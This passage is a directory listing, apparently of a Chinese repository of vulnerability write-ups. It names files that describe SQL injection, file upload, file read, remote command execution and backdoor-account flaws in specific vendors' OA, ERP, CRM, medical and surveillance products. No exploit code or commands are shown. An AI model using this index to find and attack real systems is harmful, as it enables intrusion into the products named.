└── 小狐狸Chatgpt付费创作系统存在任意文件上传漏洞.md
├── 小米
└── 小米路由器任意文件读取漏洞.md
├── 山东聚恒网络技术有限公司
└── 山东聚恒网络技术有限公司聚恒中台data.ashx存在SQL注入漏洞.md
├── 山石网科
└── 山石网科云鉴安全管理系统ajaxActions接口处存在远程命令执行漏洞.md
├── 山石网科云鉴
├── 山石网科云鉴存在前台任意命令执行漏洞.md
└── 山石网科应用防火墙WAF未授权命令注入漏洞.md
├── 帆软报表
├── 帆软报表 V8 get_geo_json 任意文件读取漏洞.md
├── 帆软报表-V8-get_geo_json-任意文件读取漏洞.md
└── 帆软系统ReportServer存在SQL注入漏洞导致RCE.md
├── 帕拉迪堡垒机
└── 帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞.md
├── 帮管客CRM
├── 帮管客CRM-jiliyu接口存在SQL漏洞.md
├── 帮管客CRMajax_upload_chat存在任意文件上传漏洞.md
├── 帮管客CRMajax_upload存在任意文件上传漏洞.md
├── 帮管客CRMinit信息泄露漏洞.md
└── 帮管客CRMmessage存在SQL注入漏洞.md
├── 平升电子水库安全监管平台
└── 平升电子水库安全监管平台GetRecordsByTableNameAndColumns存在SQL注入漏洞.md
├── 平升电子水库监管平台
├── 平升水库水文监测系统默认密码.md
└── 平升电子水库监管平台GetAllRechargeRecordsBySIMCardId接口处存在SQL注入漏洞.md
├── 广州图创图书馆集群管理系统
├── 广州图书馆集群系统WebBookNew存在SQL注入漏洞.md
├── 广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞.md
└── 广州图创图书馆集群管理系统存在未授权访问.md
├── 广州翰智软件有限公司
└── 员工自助平台loginByPassword存在SQL注入漏洞.md
├── 广州锦铭泰软件
└── F22服装管理软件系统Load存在任意文件读取漏洞.md
├── 广州锦铭泰软件科技有限公司
├── 广州锦铭泰软件科技有限公司F22服装管理软件系统index_login.asp存在信息泄漏漏洞.md
└── 广州锦铭泰软件科技有限公司F22服装管理软件系统openfile.aspx前台任意文件下载.md
├── 广联达OA
├── 广联达-linkworks-gwgdwebservice存在SQL注入漏洞.md
├── 广联达OA任意用户登录.md
├── 广联达OA前台任意文件上传.md
├── 广联达OA接口ArchiveWebService存在XML实体注入漏洞.md
├── 广联达OA系统GetSSOStamp接口存在任意用户登录.md
├── 广联达OA系统接口ConfigService.asmx存在SQL注入漏洞.md
├── 广联达OA系统接口do.asmx存在任意文件写入漏洞.md
├── 广联达OA系统接口do.asmx存在任意文件读取漏洞.md
├── 广联达oa sql注入漏洞 .md
├── 广联达oa 后台文件上传漏洞.md
├── 广联达oa-sql注入漏洞-.md
├── 广联达oa-后台文件上传漏洞.md
├── 某联达oa 后台文件上传漏洞.md
└── 某联达oa-后台文件上传漏洞.md
├── 广西金中软件集团有限公司
├── 广西金中软件集团有限公司智慧医养服务平台DownFile存在任意文件删除漏洞.md
├── 广西金中软件集团有限公司智慧医养服务平台UpLoaderAction存在任意文件上传漏洞.md
├── 广西金中软件集团有限公司智慧医养服务平台Uploader存在任意文件上传漏洞.md
└── 广西金中软件集团有限公司智慧医养服务平台Uploads存在任意文件上传漏洞.md
├── 建文工程管理系统
├── 建文工程管理系统BusinessManger.ashx存在SQL注入漏洞.md
└── 建文工程管理系统desktop.ashx存在SQL注入漏洞.md
├── 微信公众号商家收银台小程序系统
├── 微信公众号商家收银台小程序系统存在任意文件上传漏洞.md
└── 微信公众号商家收银台小程序系统存在前台SQL注入漏洞.md
├── 微信公众号小说漫画系统
├── 微信公众号小说漫画系统Upload存在任意文件写入漏洞.md
└── 微信公众号小说漫画系统fileupload.php存在任意文件写入漏洞.md
├── 微信广告任务平台
├── 微信广告任务平台ajax_upload存在任意文件上传漏洞.md
└── 微信广告任务平台存在任意文件上传漏洞.md
├── 微信活码系统
├── 微信活码系统index存在SQL注入漏洞.md
├── 微信活码系统updateInfos前台未授权任意用户密码修改.md
└── 微信活码系统后台任意内容写入.md
├── 微厦在线学习平台
└── 微厦在线学习平台OrganSetup存在任意文件上传漏洞.md
├── 微商城系统
├── 微商城系统api.php存在文件上传漏洞.md
└── 微商城系统goods.php存在SQL注入漏洞.md
├── 微擎
└── 微擎-AccountEdit-file-upload文件上传漏洞.md
├── 微擎云计算有限公司
└── 微擎微信公众号管理系统系统AccountEdit存在任意文件上传漏洞.md
├── 心医国际数字医疗
├── 心医国际WebPacs系统
│ ├── 心医国际WebPacs系统存在SQL注入漏洞.md
│ ├── 心医国际WebPacs系统存在XSS漏洞.md
│ ├── 心医国际WebPacs系统存在未授权访问漏洞.md
│ └── 心医国际系统数据库默认口令.md
├── 心医国际医技统计报表系统
│ ├── 心医国际医技统计报表系统存在SQL注入漏洞.md
│ ├── 心医国际医技统计报表系统存在XSS漏洞.md
│ └── 心医国际医技统计报表系统存在信息泄露及弱口令漏洞.md
└── 心医国际排队叫号系统
│ ├── 心医国际排队叫号系统SQL注入漏洞.md
│ └── 心医国际排队叫号系统敏感信息泄露.md
├── 志华软件
└── 志华软件openfile.aspx存在任意文件读取漏洞.md
├── 快云
└── 快云服务器助手GetDetail任意文件读取漏洞.md
├── 快普
└── 快普M6SalaryAccounting存在SQL注入漏洞.md
├── 快递微信小程序系统
├── 快递微信小程序系统存在前台任意文件删除漏洞.md
└── 快递微信小程序系统存在前台任意文件读取漏洞.md
├── 思普
└── 思普企业运营管理平台apilogin存在SQL注入漏洞.md
├── 思福迪
├── 思福迪运维安全管理系统GetCaCert存在任意文件读取漏洞.md
└── 思福迪运维安全管理系统test_qrcode_b存在远程命令执行漏洞.md
├── 思福迪运维安全管理系统
└── 思福迪运维安全管理系统RCE漏洞.md
├── 思迅商旗
├── 思迅商旗商业管理系统10SetAiPosItemImage存在任意文件上传漏洞.md
├── 思迅商旗商业管理系统7Cashier存在信息泄露漏洞.md
├── 思迅商旗商业管理系统7GylOperator存在信息泄露漏洞.md
├── 思迅商旗商业管理系统7Operator存在信息泄露漏洞.md
└── 思迅商旗商业管理系统7存在弱口令漏洞.md
├── 思迈特
└── Smartbi内置用户登陆绕过漏洞.md
├── 悟空CRM
├── 悟空CRM9.0-fastjson远程代码执行漏洞(CVE-2024-23052).md
└── 悟空CRM9.0存在fastjson远程代码执行漏洞(CVE-2024-23052).md
├── 悦库企业网盘
└── 悦库企业网盘userlogin.html存在SQL注入漏洞.md
├── 悦库网盘
└── 悦库网盘aRegisAdmin存在SQL注入漏洞.md
├── 惠尔顿-网络安全审计系统
└── 惠尔顿-网络安全审计系统存在任意文件读取漏洞.md
├── 惠尔顿
└── 惠尔顿安全审计系统download任意文件读取漏洞.md
├── 慧学教育科技有限公司
└── 慧学教育科技有限公司Campuswit_uploadFiles存在任意文件上传漏洞.md
├── 懂微信息技术(上海)有限公司
└── 百择唯·供应链RankingGoodsList2存在SQL注入漏洞.md
├── 懒人网址导航
└── 懒人网址导航系统search存在SQL注入漏洞.md
├── 懒人网址导航页
└── 懒人网址导航页search.html存在SQL注入漏洞.md
├── 成都信通网易医疗科技发展有限公司
├── HIS系统
│ ├── 成都信通网易医疗科技发展有限公司HIS系统getContractSource存在SQL注入漏洞.md
│ └── 成都信通网易医疗科技发展有限公司HIS系统getContract存在SQL注入漏洞.md
└── PACS系统
│ ├── 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)dabh存在SQL注入漏洞.md
│ ├── 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)edtJclx存在SQL注入漏洞.md
│ ├── 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在XSS跨站脚本漏洞.md
│ ├── 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在信息泄露漏洞.md
│ └── 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在未授权访问漏洞.md
├── 成都索贝数码科技
├── 索贝融媒体search存在SQL注入漏洞.md
└── 索贝融媒体存在硬编码漏洞.md
├── 手机卡号推广商城
└── 手机卡号推广商城ssk存在SQL注入漏洞.md
├── 抢单刷单系统
└── 某二开版海外抢单Shua单系统存在任意用户登录漏洞.md
├── 拓尔思TRS媒资管理系统
└── 拓尔思TRS媒资管理系统uploadThumb存在文件上传漏洞.md
├── 拼团零售商城系统
└── 拼团零售商城系统前台任意文件写入漏洞.md
├── 挂号系统
└── 挂号系统login.php存在SQL注入漏洞.md
├── 指挥调度平台
├── 指挥调度平台ajax_users存在SQL注入漏洞.md
├── 指挥调度平台client_upload存在任意文件上传漏洞.md
├── 指挥调度平台event_uploadfile存在任意文件上传漏洞.md
├── 指挥调度平台get_gis_fence_warning存在SQL注入漏洞.md
├── 指挥调度平台invite2videoconf存在远程命令执行漏洞.md
├── 指挥调度平台invite_one_member存在远程命令执行漏洞.md
├── 指挥调度平台invite_one_ptter存在远程命令执行漏洞.md
├── 指挥调度平台send_fax存在远程命令执行漏洞.md
├── 指挥调度平台task_uploadfile存在任意文件上传漏洞.md
├── 指挥调度平台usernumber存在SQL注入漏洞.md
└── 指挥调度平台zx_upload存在任意文件上传漏洞.md
├── 挖矿质押单语言系统
├── 某U挖矿质押单语言系统imageupload后台任意文件上传漏洞.md
├── 某U挖矿质押单语言系统前台未授权修改管理员密码.md
└── 某U挖矿质押单语言系统后台phar反序列漏洞.md
├── 捷诚管理信息系统
└── 捷诚管理信息系统sql注入漏洞.md
├── 数字通OA
├── 数字通OA-智慧政务接口payslip存在SQL注入漏洞.md
├── 数字通云平台智慧政务setting存在文件上传漏洞.md
├── 数字通云平台智慧政务workflow存在SQL注入漏洞.md
└── 数字通云平台的智慧政务系统存在登录绕过漏洞.md
├── 斐讯路由器
└── 斐讯路由器PHICOMM-FIR300M型号存在命令执行漏洞.md
├── 新中新中小学智慧校园信息管理系统
└── 新中新中小学智慧校园信息管理系统Upload接口存在任意文件上传漏洞.md
├── 新开普掌上校园服务管理平台
└── 新开普掌上校园服务管理平台service.action远程命令执行.md
├── 新视窗新一代物业管理系统
├── 新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞.md
└── 新视窗新一代物业管理系统任意文件上传漏洞.md
├── 方天云智慧平台系统
├── 方天云智慧平台系统GetCompanyItem存在sql注入漏洞.md
├── 方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞.md
├── 方天云智慧平台系统Upload.ashx存在任意文件上传漏洞.md
└── 方天云智慧平台系统setImg.ashx存在文件上传漏洞.md
├── 方天科技(深圳)有限公司
├── 方天云ERP系统GetCompanyItem存在SQL注入漏洞.md
└── 方天云ERP系统GetSalQuatation存在SQL注入漏洞.md
├── 方正全媒体
├── 方正全媒体采编系统存在syn.do信息泄露漏洞.md
├── 方正畅享全媒体新闻采编系统addOrUpdateOrg存在XXE漏洞.md
├── 方正畅享全媒体新闻采编系统binary.do存在SQL注入漏洞.md
├── 方正畅享全媒体新闻采编系统imageProxy.do任意文件读取漏洞.md
├── 方正畅享全媒体新闻采编系统reportCenter.do存在SQL注入漏洞.md
└── 方正畅享全媒体新闻采编系统screen.do存在SQL注入漏洞.md
├── 时空WMS
├── 时空WMS-仓储精细化管理系统ImageAdd.ashx文件上传漏洞.md
└── 时空WMS-仓储精细化管理系统SaveCrash.ashx文件上传漏洞.md
├── 时空智友
├── 时空智友企业流程化管控系统formserverSQL注入漏洞.md
├── 时空智友企业流程化管控系统formserver任意文件上传漏洞.md
├── 时空智友企业流程化管控系统indexService.notice存在sql注入漏洞.md
├── 时空智友企业流程化管控系统login文件读取漏洞.md
├── 时空智友企业流程化管控系统manage敏感信息泄露漏洞.md
└── 时空智友企业流程化管控系统wc.db文件信息泄露漏洞.md
├── 时空物流运输管理系统
└── 时空物流运输管理系统存在敏感信息泄露漏洞.md
├── 时间精细化管理平台
└── 时间精细化管理平台存在弱口令漏洞.md
├── 昂捷CRM
├── 昂捷CRMcwsfiledown存在任意文件读取漏洞.md
└── 昂捷CRMcwsuploadpicture存在任意文件读取漏洞.md
├── 昂捷ERP
├── 昂捷CRM系统cwsfiledown.asmx任意文件读取漏洞.md
├── 昂捷CRM系统cwsuploadpicture.asmx任意文件读取漏洞.md
├── 昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071).md
└── 昂捷ERP-WebService接口-SQL注入漏洞(QVD-2023-45071).md
├── 昆石网络
└── 昆石网络VOS3000任意文件读取漏洞.md
├── 明源云
├── 明源云ERP接口ApiUpdate.ashx文件上传漏洞.md
├── 明源云ERP接口VisitorWeb_XMLHTTP.aspx存在SQL注入漏洞.md
├── 明源云GetErpConfig.aspx信息泄露漏洞.md
├── 明源地产ERP接口Service.asmx存在SQL注入漏洞.md
└── 明源地产ERP系统WFWebService存在反序列化漏洞.md
├── 明源云erp
└── 明源云ERP系统接口管家ApiUpdate.ashx文件存在任意文件上传漏洞.md
├── 易天智能eHR管理平台
└── 易天智能eHR管理平台任意用户添加漏洞.md
├── 易宝OA
├── 易宝OA ExecuteSqlForSingle SQL注入漏洞.md
├── 易宝OA-BasicService.asmx存在SQL注入漏洞.md
├── 易宝OA-BasicService.asmx存在任意文件上传漏洞.md
├── 易宝OA-ExecuteQueryNoneResult接口处存在SQL注入漏洞.md
├── 易宝OA-ExecuteSqlForDataSet接口处存在SQL注入漏洞.md
├── 易宝OA-ExecuteSqlForSingle-SQL注入漏洞.md
├── 易宝OA-GetUDEFStreamID存在SQL注入漏洞.md
└── 易宝OA系统DownloadFile接口存在文件读取漏洞.md
├── 易思智能物流
├── 易思智能物流无人值守系统ImportReport任意文件上传漏洞.md
└── 易思智能物流无人值守系统downfile文件读取漏洞.md
├── 易思智能物流无人值守系统
├── 易思智能物流无人值守系统5.0存在任意文件上传漏洞.md
├── 易思智能物流无人值守系统DownFile任意文件读取漏洞.md
├── 易思智能物流无人值守系统ExportReport存在SQL注入漏洞.md
└── 易思智能物流无人值守系统login存在SQL注入漏洞.md
├── 易捷OA
└── 易捷OA协同办公软件ShowPic接口存在任意文件读取.md
├── 普元EOS-Platform
├── 普元EOS-Platform-eos.jmx存在远程代码执行漏洞.md
└── 普元EOS-Platform-jmx.jmx存在远程代码执行漏洞(XVE-2023-24691).md
├── 智互联科技有限公司
├── SRM智联云采系统getSuppliers存在SQL注入漏洞.md
├── SRM智联云采系统inquiry存在SQL注入漏洞.md
├── SRM智联云采系统quickReceiptDetail存在SQL注入漏洞.md
├── SRM智联云采系统receiptDetail存在SQL注入漏洞.md
├── SRM智联云采系统statusList存在SQL注入漏洞.md
├── 智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞.md
├── 智联云采SRM2.0系统接口autologin身份认证绕过漏洞.md
└── 智联云采testService存在SQL注入漏洞.md
├── 智慧校园(安校易)管理系统
├── 智慧校园(安校易)管理系统FileUpAd.aspx任意文件上传漏洞.md
└── 智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞.md
├── 智能停车管理系统
├── 智能停车管理系统GetPasswayData存在SQL注入漏洞.md
└── 智能停车管理系统ToLogin存在SQL注入漏洞.md
├── 智跃人力资源管理系统
├── 智跃人力资源管理系统GenerateEntityFromTable.aspx SQL漏洞.md
├── 智跃人力资源管理系统GenerateEntityFromTable.aspx-SQL漏洞.md
└── 智跃人力资源管理系统GenerateEntityFromTable.aspxSQL注入漏洞.md
├── 智邦国际ERP
├── 智邦国际ERP-GetPersonalSealData.ashx存在SQL注入漏洞.md
└── 智邦国际ERPGetPersonalSealData.ashx接口SQL注入漏洞.md
├── 月子会所ERP
├── 月子会所ERP管理云平台AttachedHandler任意文件上传漏洞.md
├── 月子会所ERP管理云平台BasicInfo任意文件上传漏洞.md
├── 月子会所ERP管理云平台ContractManager任意文件上传漏洞.md
├── 月子会所ERP管理云平台ICManager任意文件上传漏洞.md
├── 月子会所ERP管理云平台MicroMall任意文件上传漏洞.md
├── 月子会所ERP管理云平台ModuleUpHandler任意文件上传漏洞.md
├── 月子会所ERP管理云平台SelectUserMangerPrint存在SQL注入漏洞.md
├── 月子会所ERP管理云平台UploadComponent任意文件上传漏洞.md
├── 月子会所ERP管理云平台upload任意文件上传漏洞.md
└── 月子会所ERP管理云平台存在目录遍历漏洞.md
├── 朗新天霁人力资源管理系统
├── 朗新天霁人力资源管理系统GetMessage存在sql注入漏洞.md
└── 朗新天霁智能eHR人力资源管理系统GetE01ByDeptCode存在SQL注入漏洞.md
├── 朗速ERP
├── 朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md
└── 朗速ERP系统接口UEditorAjaxApi.ashx存在SSRF漏洞.md
├── 杜特网
├── 杜特网上订单管理系统Login.ashx存在SQL注入漏洞.md
└── 杜特网上订单管理系统getUserImage.ashx存在SQL注入漏洞.md
├── 杭州三一谦成科技车辆监控服务平台
└── 杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞.md
├── 杭州圣乔科技有限公司
└── 圣乔ERP系统存在struts2远程命令执行漏洞.md
├── 杭州帕拉迪网络科技有限公司
└── 帕拉迪堡垒机sslvpnservice.php存在SQL注入漏洞.md
├── 杭州雄威餐厅数字化综合管理平台
└── 杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞.md
├── 极简云
├── 极简云验证系统download存在任意文件读取漏洞.md
└── 极简云验证系统存在敏感信息泄露漏洞.md
├── 极限OA
└── 极限OA接口video_file.php存在任意文件读取漏洞.md
├── 某业务管理系统
└── 某业务管理系统LoginUser存在信息泄露漏洞.md
├── 某短视频直播打赏系统
├── 某短视频直播打赏系统任意文件读取漏洞.md
├── 某短视频直播打赏系统后台任意文件上传漏洞.md
└── 某短视频系统视频知识付费系统存在前台任意文件读取漏洞.md
├── 正方
├── 正方教学管理信息服务平台ReportServer存在任意文件读取漏洞.md
├── 正方数字化校园平台RzptManage存在任意文件写入漏洞.md
└── 正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞.md
├── 武汉天喻软件有限公司
└── 天喻软件数据安全平台
│ ├── 天喻软件数据安全平台Setmng.ashx存在SQL注入漏洞.md
│ └── 天喻软件数据安全平台存在目录遍历漏洞.md
├── 武汉金同方
└── 月子会所ERP管理云平台GetData.ashx存在SQL注入.md
├── 汇智ERP
├── 汇智ERP接口filehandle.aspx存在任意文件读取漏洞.md
└── 汇智ERP系统Upload.aspx存在文件上传漏洞.md
├── 汉得
└── 汉得SRMtomcat.jsp登录绕过漏洞.md
├── 汉得SRM
├── 汉得SRM tomcat.jsp 登录绕过漏洞.md
└── 汉得SRM-tomcat.jsp-登录绕过漏洞.md
├── 江西云本数字科技有限公司
└── 江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞.md
├── 江阴汇智软件技术有限公司
└── 汇智ERPfilehandle存在任意文件读取漏洞.md
├── 泛微OA
├── 某微 E-Cology 某版本 SQL注入漏洞.md
├── 某微-E-Cology-某版本-SQL注入漏洞.md
├── 某微E-Office9文件上传漏洞 CVE-2023-2648.md
├── 某微E-Office9文件上传漏洞-CVE-2023-2523.md
├── 某微E-Office9文件上传漏洞-CVE-2023-2648.md
├── 泛微 HrmCareerApplyPerView sql注入漏洞.md
├── 泛微-EMobile存在弱口令漏洞.md
├── 泛微-HrmCareerApplyPerView-sql注入漏洞.md
├── 泛微-OA系统ResourceServlet接口任意文件读取漏洞.md
├── 泛微-eoffice-webservice-file-upload任意文件上传漏洞.md
├── 泛微E-Cology-KtreeUploadAction任意文件上传漏洞.md
├── 泛微E-Cology9平台QRcodeBuildAction存在身份认证绕过导致SQL注入漏洞.md
├── 泛微E-Cology接口getFileViewUrl存在SSRF漏洞.md
├── 泛微E-Cology系统接口CptInstock1Ajax存在SQL注入漏洞.md
├── 泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞.md
├── 泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞.md
├── 泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞.md
├── 泛微E-Mobile-client.do存在命令执行漏洞.md
├── 泛微E-Mobile-messageType.do存在命令执行漏洞.md
├── 泛微E-MobileServer远程命令执行漏洞.md
├── 泛微E-Mobile硬编码口令漏洞(XVE-2024-28095).md
├── 泛微E-Mobile系统接口cdnfile存在任意文件读取漏洞.md
├── 泛微E-Mobile系统接口installOperate.do存在SSRF漏洞.md
├── 泛微E-Office-json_common.phpSQL注入漏洞.md
├── 泛微E-Office-jx2_config存在信息泄露漏洞.md
├── 泛微E-Office-uploadfile.php任意文件上传漏洞.md
├── 泛微E-Office10-OfficeServer任意文件上传漏洞.md
├── 泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md
├── 泛微E-Office9文件上传漏洞(CVE-2023-2523).md
├── 泛微E-Office系统login_other.php存在sql注入漏洞.md
├── 泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202).md
├── 泛微E-office-10接口leave_record.php存在SQL注入漏洞.md
├── 泛微OA-E-Cology-FileDownload文件读取漏洞.md
├── 泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞.md
├── 泛微OA-E-Cology-JqueryFileTree.jsp目录遍历漏洞.md
├── 泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞.md
├── 泛微OA-E-Mobile移动管理平台lang2sql任意文件上传漏洞.md
├── 泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞.md
├── 泛微e-Mobile移动管理平台error存在远程命令执行漏洞.md
├── 泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞.md
├── 泛微e-cology-v10远程代码执行漏洞.md
├── 泛微e-cology9_SQL注入-CNVD-2023-12632.md
├── 泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112).md
├── 泛微e-cology9接口XmlRpcServlet存在任意文件读取漏洞.md
├── 泛微e-cology9系统接口FileDownloadLocation接口存在SQL注入漏洞.md
├── 泛微e-cology接口HrmService前台SQL注入漏洞.md
├── 泛微e-cology接口getLabelByModule存在sql注入漏洞.md
├── 泛微e-office 未授权访问.md
├── 泛微e-office-mobile_upload_save存在任意文件上传漏洞.md
├── 泛微e-office-uploadify.php存在任意文件上传漏洞.md
├── 泛微e-office-未授权访问.md
├── 泛微e-office10系统schema_mysql.sql敏感信息泄露漏洞.md
├── 泛微e-office系统UserSelect接口存在未授权访问漏洞.md
├── 泛微e-office系统sms_page.php接口存在sql注入漏洞.md
├── 泛微ecology9系统接口ModeDateService存在SQL漏洞.md
├── 泛微ecology系统setup接口存在信息泄露漏洞.md
├── 泛微ecology系统接口BlogService存在SQL注入漏洞.md
├── 泛微getE9DevelopAllNameValue2接口存在任意文件读取漏洞.md
├── 泛微云桥 e-Bridge addTaste接口SQL注入漏洞.md
├── 泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞.md
├── 泛微云桥-e-Bridge-addTaste接口SQL注入漏洞.md
├── 泛微云桥e-Bridge系统checkMobile存在SQL注入漏洞.md
├── 泛微云桥e-Bridge系统接口addTasteJsonp存在SQL注入漏洞.md
└── 泛微移动管理平台lang2sql接口任意文件上传.md
├── 济南上邦电子科技有限公司
└── 电子文档安全管理系统V6.0存在任意文件下载.md
├── 浙大恩特CRM
├── 浙大恩特CRMAuthorityJudgement存在SQL注入漏洞.md
├── 浙大恩特CRMFollowAction存在SQL注入漏洞.md
├── 浙大恩特CRMT0140_editActionSQL注入漏洞.md
├── 浙大恩特CRMfileupload.jsp任意文件上传漏洞.md
├── 浙大恩特CRMloadFile任意文件上传漏洞.md
├── 浙大恩特CRMmachord_doc任意文件上传漏洞.md
├── 浙大恩特CRMsaveAttaFile任意文件上传漏洞.md
├── 浙大恩特CRMsaveFileByPhone任意文件上传漏洞.md
└── 浙大恩特CRMzipFileUpload任意文件上传漏洞.md
├── 浙大恩特客户资源管理系统
├── 浙大恩特客户资源管理系统 文件上传和sql注入漏洞.md
├── 浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入.md
├── 浙大恩特客户资源管理系统-purchaseaction.entphone接口存在SQL漏洞.md
├── 浙大恩特客户资源管理系统-文件上传和sql注入漏洞.md
├── 浙大恩特客户资源管理系统Quotegask_editAction存在SQL注入漏洞.md
└── 浙大恩特客户资源管理系统crmbasicaction任意文件上传.md
├── 浙江宇视
├── 浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞.md
├── 浙江宇视媒体服务器-user-信息泄露漏洞.md
├── 浙江宇视科技视频监控main-cgi密码泄露漏洞.md
└── 浙江宇视网络视频录像机LogReport.php远程命令执行.md
├── 浪潮
└── 浪潮GS企业管理软件xtdysrv存在反序列化漏洞.md
├── 浪潮云
├── HCM-Cloud云端专业人力资源平台download任意文件读取漏洞.md
├── 浪潮云财务系统UploadListFile存在任意文件上传漏洞.md
├── 浪潮云财务系统bizintegrationwebservice.asmx存在命令执行漏洞.md
└── 浪潮云财务系统xtdysrv.asmx存在命令执行漏洞.md
├── 海信
├── 海信智能公交企业管理系统AdjustWorkHours.aspx存在SQL注入漏洞.md
├── 海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞.md
└── 海信智能公交企业管理系统apply.aspx存在SQL注入漏洞.md
├── 海信智能公交企业管理系统
└── 海信智能公交企业管理系统OrgInfoMng.aspx存在SQL注入漏洞.md
├── 海外抢单刷单系统
└── 某二开版海外抢单Shua单系统存在任意用户登录漏洞.md
├── 海康威视
├── HiKVISION 综合安防管理平台 任意文件上传漏洞.md
├── HiKVISION-综合安防管理平台-任意文件上传漏洞.md
├── 海康威视-综合安防管理平台-files-文件读取.md
├── 海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行.md
├── 海康威视CVE-2023-6895-IP网络对讲广播系统远程命令执行.md
├── 海康威视IP摄像机_NVR设备固件
│ └── 海康威视IP摄像机_NVR设备固件远程代码执行漏洞(CVE-2021-36260).md
├── 海康威视IP网络对讲广播系统任意文件下载漏洞CVE-2023-6893.md
├── 海康威视IVMS-8700 fastjson命令执行漏洞.md
├── 海康威视IVMS-8700-fastjson命令执行漏洞.md
├── 海康威视SPONIP网络对讲广播系统
│ ├── 海康威视SPONIP网络对讲广播系统addscenedata存在任意文件上传漏洞.md
│ ├── 海康威视SPONIP网络对讲广播系统busyscreenshotpush存在任意文件上传漏洞.md
│ ├── 海康威视SPONIP网络对讲广播系统exportrecord存在任意文件读取漏洞.md
│ ├── 海康威视SPONIP网络对讲广播系统getjson存在任意文件读取漏洞.md
│ ├── 海康威视SPONIP网络对讲广播系统getuserdata存在信息泄露漏洞.md
│ ├── 海康威视SPONIP网络对讲广播系统index存在信息泄露漏洞.md
│ ├── 海康威视SPONIP网络对讲广播系统my_parser存在任意文件上传漏洞.md
│ ├── 海康威视SPONIP网络对讲广播系统rj_get_token存在任意文件读取漏洞.md
│ ├── 海康威视SPONIP网络对讲广播系统uploadjson存在任意文件上传漏洞.md
│ ├── 海康威视SPONIP网络对讲广播系统存在后门账号漏洞.md
│ └── 海康威视SPONIP网络对讲广播系统存在命令执行漏洞(CVE-2023-6895).md
├── 海康威视iSecureCenter综合安防管理平台
│ ├── 海康威视iSecureCenter综合安防管理平台center任意文件上传漏洞.md
│ ├── 海康威视iSecureCenter综合安防管理平台config.properties信息泄漏漏洞.md
│ ├── 海康威视iSecureCenter综合安防管理平台download任意文件读取漏洞.md
│ ├── 海康威视iSecureCenter综合安防管理平台env信息泄漏漏洞.md
│ ├── 海康威视iSecureCenter综合安防管理平台files接口存在任意文件读取漏洞.md
│ ├── 海康威视iSecureCenter综合安防管理平台findcomponent泄漏漏洞.md
│ ├── 海康威视iSecureCenter综合安防管理平台find信息泄漏漏洞.md
│ ├── 海康威视iSecureCenter综合安防管理平台lm任意文件上传漏洞.md
│ ├── 海康威视iSecureCenter综合安防管理平台meta信息泄漏漏洞.md
│ ├── 海康威视iSecureCenter综合安防管理平台ssoService远程代码执行漏洞.md
│ ├── 海康威视iSecureCenter综合安防管理平台svm文件上传漏洞.md
│ └── 海康威视iSecureCenter综合安防管理平台存在applyCTFastjson命令执行漏洞.md
├── 海康威视iVMS综合安防系统
│ ├── 海康威视iVMS-8700综合安防管理平台download任意文件下载.md
│ ├── 海康威视iVMS-8700综合安防管理平台getAllUserInfo存在信息泄露漏洞.md
│ ├── 海康威视iVMS-8700综合安防管理平台getPic任意文件上传.md
│ ├── 海康威视iVMS-8700综合安防管理平台query存在硬编码漏洞.md
│ ├── 海康威视iVMS-8700综合安防管理平台upload.action任意文件上传.md
│ └── 海康威视iVMS-8700综合安防系统resourceOperations任意文件上传漏洞.md
├── 海康威视iVMS综合安防系统resourceOperations接口任意文件上传漏洞.md
├── 海康威视安全接入网关任意文件读取漏洞.md
├── 海康威视流媒体管理服务器
│ └── 海康威视流媒体管理服务器user.xml账号密码泄漏漏洞.md
├── 海康威视综合安防download存在任意文件读取漏洞.md
├── 海康威视综合安防管理平台applyAutoLoginTicket远程代码执行漏洞.md
├── 海康威视综合安防管理平台clusters接口存在任意文件上传漏洞.md
├── 海康威视综合安防管理平台keepAlive远程代码执行漏洞.md
├── 海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞.md
├── 海康威视综合安防管理平台productFile远程代码执行.md
├── 海康威视综合安防管理平台uploadAllPackage任意文件上传漏洞.md
├── 海康威视综合安防管理平台信息泄露.md
├── 海康威视综合安防系统detection接口存在RCE漏洞.md
├── 海康威视视频编码设备接入网关
│ ├── 海康威视视频编码设备接入网关showFile.php任意文件下载漏洞.md
│ └── 海康威视视频编码设备接入网关userinfodata接口存在信息泄漏漏洞.md
├── 海康威视运行管理中心applyST远程代码执行漏洞(XVE-2024-33936).md
└── 海康威视运行管理中心fastjson漏洞.md
├── 海洋cms
├── SeaCMS海洋影视管理系统dmku存在SQL注入漏洞.md
├── SeaCMS海洋影视管理系统index.php存在SQL注入漏洞.md
├── 海洋CMS-admin_notify.php远程代码执行漏洞.md
└── 海洋CMS后台admin_smtp.php存在远程代码执行漏洞.md
├── 海翔ERP
